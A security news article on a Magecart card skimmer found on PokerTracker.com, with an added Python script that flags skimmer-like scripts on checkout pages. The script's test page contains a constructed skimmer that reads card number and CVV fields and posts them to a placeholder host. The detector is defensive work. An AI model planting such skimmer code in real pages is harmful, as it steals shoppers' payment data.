Chips are down: PokerTracker.com hit by Magecart hackers

A popular website that poker players use to improve their game through statistical analysis has come under attack. The site in question, PokerTracker.com, was discovered to be serving a Magecart script that seeks to steal payment card data. Malwarebytes researchers were the first to uncover the situation, after a user reported suspicious activity on the Malwarebytes forums. Magecart is believed to be responsible for several previous high-profile hacks.

In the exchange, which can be found here, the user smokingjoker reports that his Malwarebytes software blocked traffic to the domain ajaxclick.com. The data that smokingjoker provided showed PokerTracker.com generating outbound traffic to the IP address 172.93.103.194 on port 50426. As the staff member AdvancedSetup stated in response, “ajaxclick[.]com is a domain that hosts a credit card skimmer. Skimmers are pieces of code that can steal credit card details from unaware online shoppers. What is unusual in your case is the fact that this is a poker application that attempts to connect to this site, rather than your internet browser. However, this is not a false positive and we will keep blocking this site.”

According to Malwarebytes’ subsequent blog post on the incident, the skimmer carrying the Magecart code was crafted specifically to target PokerTracker.com. Researchers reached that conclusion because the script’s “variable names match its input form fields,” and, additionally, “the data portion of the skimmer script has the site’s name hardcoded as well.” Malwarebytes researchers attribute the skimmer injection to an outdated sub-domain and root domain. Specifically, the blog post notes that both domains are running Drupal version 6.3x, which has been verified to be outdated and highly vulnerable to these types of attacks. Researchers also noted their surprise at finding Magecart code here, the main reason being that Magecart skimmers usually exploit vulnerabilities in Magento rather than Drupal.
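As an added illustration (not code from the article or from Malwarebytes), the check below applies the attribution logic the post describes, an inline script that both reads the checkout form’s fields and talks to a host outside the site’s own domain, to a constructed page; the field names, hostnames and HTML are assumptions made for the example.

```python
# Added example: flag page scripts showing the pattern the article describes,
# inline code that reads payment form fields and contacts a host outside the
# site's own domain. All HTML and hostnames below are constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def _is_first_party(host, site):
    return host == site or host.endswith("." + site)

class _PageScan(HTMLParser):
    """Collect input names, external script sources and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.fields, self.srcs, self.inline, self._buf = [], [], [], []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("name"):
            self.fields.append(a["name"])
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.srcs.append(a["src"])
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            if self._buf:
                self.inline.append("".join(self._buf))
            self._buf = []
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

def find_skimmer_indicators(html, site):
    """Return (foreign script hosts, inline scripts that read form fields
    and reference a non-first-party host)."""
    p = _PageScan()
    p.feed(html)
    src_hosts = [urlparse(s).hostname for s in p.srcs]
    foreign = sorted({h for h in src_hosts if h and not _is_first_party(h, site)})
    suspicious = []
    for js in p.inline:
        hosts = sorted({h.lower() for h in HOST_RE.findall(js)
                        if not _is_first_party(h.lower(), site)})
        touched = [f for f in p.fields if f in js]
        if hosts and touched:  # form fields read AND data sent off-site
            suspicious.append({"hosts": hosts, "fields": touched})
    return foreign, suspicious

# Constructed checkout page: one first-party CDN script, one third-party
# script, and an inline script that reads card fields and posts elsewhere.
SAMPLE_HTML = """<form><input name="cc_number"><input name="cc_exp">
<input name="cc_cvv"></form>
<script src="https://cdn.example.com/app.js"></script>
<script src="https://static.thirdparty.invalid/a.js"></script>
<script>var n=document.getElementsByName('cc_number')[0].value,
c=document.getElementsByName('cc_cvv')[0].value;
fetch('https://exfil.invalid/c',{method:'POST',body:n+c});</script>"""

if __name__ == "__main__":
    print(find_skimmer_indicators(SAMPLE_HTML, "example.com"))
```

Run against a real checkout page, a non-empty second list is the signal worth triaging; the first list is simply the third-party script inventory to compare against what the site is known to load.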

It appears that an up-to-date malware blocker will protect you against this skimming attack. Nevertheless, poker players should avoid PokerTracker.com for now, until the site updates its Drupal version. The last thing you want is for hackers to hold pocket aces before the flop while you are sitting on a 4 and 10 offsuit.

Featured image: Flickr/Matt Galisa

Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and a tech journalist committed to creating a society that is informed about information security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.
